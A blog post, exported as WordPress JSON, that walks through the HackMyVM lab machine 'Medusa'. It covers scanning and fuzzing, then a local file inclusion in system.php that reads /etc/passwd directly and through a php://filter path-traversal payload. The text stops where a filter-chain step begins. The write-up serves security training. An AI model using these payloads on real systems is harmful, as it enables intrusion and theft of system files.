{"id":633,"date":"2024-04-26T17:53:55","date_gmt":"2024-04-26T09:53:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=633"},"modified":"2024-04-26T17:54:59","modified_gmt":"2024-04-26T09:54:59","slug":"hmv-_-medusa","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/633\/04\/26\/2024\/","title":{"rendered":"hmv[-_-]Medusa"},"content":{"rendered":"<h1>Medusa<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261602528.png\" alt=\"image-20240426160253918\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753483.png\" alt=\"image-20240426160436448\" style=\"zoom:50%;\" 
\/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/medusa]\n\u2514\u2500$ rustscan -a 192.168.0.109 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.109:21\nOpen 192.168.0.109:22\nOpen 192.168.0.109:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex &#039;^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*&lt;title&gt;HP (Color |)LaserJet ([\\w._ -]+)&nbsp;&nbsp;&nbsp;&#039;\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 04:05 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nInitiating Ping Scan at 04:05\nScanning 192.168.0.109 [2 ports]\nCompleted Ping Scan at 04:05, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 04:05\nCompleted Parallel DNS resolution of 1 host. at 04:05, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. 
Mode: Async [#: 3, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 04:05\nScanning medusa (192.168.0.109) [3 ports]\nDiscovered open port 80\/tcp on 192.168.0.109\nDiscovered open port 22\/tcp on 192.168.0.109\nDiscovered open port 21\/tcp on 192.168.0.109\nCompleted Connect Scan at 04:05, 0.00s elapsed (3 total ports)\nInitiating Service scan at 04:05\nScanning 3 services on medusa (192.168.0.109)\nCompleted Service scan at 04:05, 6.08s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.109.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 2.52s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.03s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNmap scan report for medusa (192.168.0.109)\nHost is up, received syn-ack (0.00037s latency).\nScanned at 2024-04-26 04:05:03 EDT for 9s\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 70:d4:ef:c9:27:6f:8d:95:7a:a5:51:19:51:fe:14:dc (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDv4Q5cpQcRXYQ70CJSzZRxXFH6tuoJTM53mCVczFIZ2Urzv0s\/jbfw\/HqDxogNi2VTulyIaV2Qjbif+LG4h\/PV5omSnTjLbaIoHEqy1ADJk0jXsMCGy31Iezmdh70UFtjMUP+\/HIGvDmpckPPKzG1\/OKUnctNSHEzkIRjqCAKC9\/XRdnREcKd6QEWVMk4dGlwdcCWLu6RyRGYb9ytIxO1CJI9\/b911PDv1qOFRw3xEPbyXxDHQO+aKRfDWYfWHZPzi\/LwDTgKZ7CuV2cz0uFE+nM+5aeIuyffkT4ViezkLNbCOlkdpi1D3fGlQhRrMtDP9mUpjENJwyB95QCdbT+yLuBkIDdNL59i4vZN2AS\/L307QF6kh\/37hy8scksq\/eDWrxhOhhyTcATwSV9ZeiWm5O7VgIxY\/8Q4GlqeSTMXY4HZS\/oLu+ABvB\/Rv3PVV2WEoZKgpWdgFbFpo0TRuaE7jlRa5ertqrQiCVAPAb8crAMDDaMtcmoSz\/FHA5aKu45U=\n|   256 3f:8d:24:3f:d2:5e:ca:e6:c9:af:37:23:47:bf:1d:28 (ECDSA)\n| ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLAG2BM8Qp6PJMrgKjDrMPVgCsANoTZTePFUDsc0gYJkZUWPt04uYyBAzPuxSf6U0UQPN846rYWaBeHavSfLRKc=\n|   256 0c:33:7e:4e:95:3d:b0:2d:6a:5e:ca:39:91:0d:13:08 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN+WcY1Uu0g6LNsI0roz56ThI9v7ogotmKl2wgTviIHx\n80\/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Apache2 Debian Default Page: It works\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:05\nCompleted NSE at 04:05, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 9.40 seconds<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.109 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.109\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 10674]\n\/.php                 (Status: 403) [Size: 278]\n\/manual               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.109\/manual\/]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\n\/hades                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.109\/hades\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753485.png\" alt=\"image-20240426160731950\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753486.png\" alt=\"image-20240426161545564\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-apl\">Kraken<\/code><\/pre>\n<h3>Port Probing<\/h3>\n<p>Port 21 does not allow anonymous login...<\/p>\n<h3>Sensitive Directories<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.109\/hades -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x 
php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.109\/hades\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,bak,jpg,txt,html,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/index.php            (Status: 200) [Size: 0]\n\/.html                (Status: 403) [Size: 278]\n\/door.php             (Status: 200) [Size: 555]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ curl http:\/\/192.168.0.109\/hades\/door.php -X POST -d &quot;word=Kraken&quot;           \n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;link rel=&quot;stylesheet&quot; href=&quot;styles.css&quot;&gt;\n\n    &lt;title&gt;Door&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n &lt;form action=&quot;d00r_validation.php&quot; 
method=&quot;POST&quot;&gt;\n    &lt;label for=&quot;word&quot;&gt;Please enter the magic word...&lt;\/label&gt;\n    &lt;input id=&quot;word&quot; type=&quot;text&quot; required maxlength=&quot;6&quot; name=&quot;word&quot;&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;submit&quot;&gt;\n &lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ curl http:\/\/192.168.0.109\/hades\/d00r_validation.php -X POST -d &quot;word=Kraken&quot;\n&lt;head&gt;\n    &lt;link rel=&quot;stylesheet&quot; href=&quot;styles.css&quot;&gt;\n    &lt;title&gt;Validation&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;source&gt;&lt;marquee&gt;medusa.hmv&lt;\/marquee&gt;&lt;\/source&gt;<\/code><\/pre>\n<p>Try updating the DNS resolution:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ sudo su                    \n[sudo] password for kali: \n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# vim \/etc\/hosts<\/code><\/pre>\n<pre><code class=\"language-apl\">192.168.0.109   medusa.hmv<\/code><\/pre>\n<h3>Fuzzing Subdomains<\/h3>\n<p>Took a look at what is there and found nothing had changed, so try fuzzing!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# ffuf -u http:\/\/medusa.hmv -H &#039;Host: FUZZ.medusa.hmv&#039; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -fw 3423\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       
v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/medusa.hmv\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt\n :: Header           : Host: FUZZ.medusa.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 3423\n________________________________________________\n\ndev                     [Status: 200, Size: 1973, Words: 374, Lines: 26, Duration: 1026ms]\n:: Progress: [114441\/114441] :: Job [1\/1] :: 1886 req\/sec :: Duration: [0:01:02] :: Errors: 0 ::<\/code><\/pre>\n<p>Add it to \/etc\/hosts:<\/p>\n<pre><code class=\"language-apl\">192.168.0.109   dev.medusa.hmv <\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# gobuster dir -u &quot;http:\/\/dev.medusa.hmv\/&quot; -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -x php,txt,zip,bak,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/dev.medusa.hmv\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,zip,bak,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html        
        (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 1973]\n\/.php                 (Status: 403) [Size: 279]\n\/files                (Status: 301) [Size: 316] [--&gt; http:\/\/dev.medusa.hmv\/files\/]\n\/assets               (Status: 301) [Size: 317] [--&gt; http:\/\/dev.medusa.hmv\/assets\/]\n\/css                  (Status: 301) [Size: 314] [--&gt; http:\/\/dev.medusa.hmv\/css\/]\n\/manual               (Status: 301) [Size: 317] [--&gt; http:\/\/dev.medusa.hmv\/manual\/]\n\/robots.txt           (Status: 200) [Size: 489]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# gobuster dir -u &quot;http:\/\/dev.medusa.hmv\/files&quot; -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -x php,txt,zip,bak,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/dev.medusa.hmv\/files\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,html,php,txt,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php    
             (Status: 403) [Size: 279]\n\/index.php            (Status: 200) [Size: 0]\n\/.html                (Status: 403) [Size: 279]\n\/system.php           (Status: 200) [Size: 0]\n\/readme.txt           (Status: 200) [Size: 144]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>See what is there:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/readme.txt\n-----------------------------------------------\n+  Don&#039;t trust your eyes, trust your instinct +\n-----------------------------------------------\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php<\/code><\/pre>\n<p>Try fuzzing for the relevant parameter:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# ffuf -u http:\/\/dev.medusa.hmv\/files\/system.php?FUZZ=\/etc\/passwd -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -fw 1\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/dev.medusa.hmv\/files\/system.php?FUZZ=\/etc\/passwd\n :: Wordlist         : FUZZ: 
\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 1\n________________________________________________\n\nview                    [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n:: Progress: [220560\/220560] :: Job [1\/1] :: 4347 req\/sec :: Duration: [0:00:44] :: Errors: 0 ::<\/code><\/pre>\n<h3>Method 1: LFI and PHP Filter Chain<\/h3>\n<p>Try the LFI!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php?view=\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network 
Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nspectre:x:1000:1000:spectre,,,:\/home\/spectre:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:106:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin<\/code><\/pre>\n<p>Try including some other files:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\ncm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9u
ZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXRpbWVzeW5jOng6MTA0OjExMDpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA1OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc3BlY3RyZTp4OjEwMDA6MTAwMDpzcGVjdHJlLCwsOi9ob21lL3NwZWN0cmU6L2Jpbi9iYXNoCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgpmdHA6eDoxMDY6MTEzOmZ0cCBkYWVtb24sLCw6L3Nydi9mdHA6L3Vzci9zYmluL25vbG9naW4K                                                                                                                                                        \n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# curl http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd | base64 -d\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100  1936  100  1936    0     0  1103k      0 --:--:-- --:--:-- --:--:-- 
1890k\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nspectre:x:1000:1000:spectre,,,:\/home\/spectre:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:106:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin<\/code><\/pre>\n<p>Nice. Try building the corresponding chain with <code>php_filter_chain_generator<\/code>:<\/p>\n<pre><code 
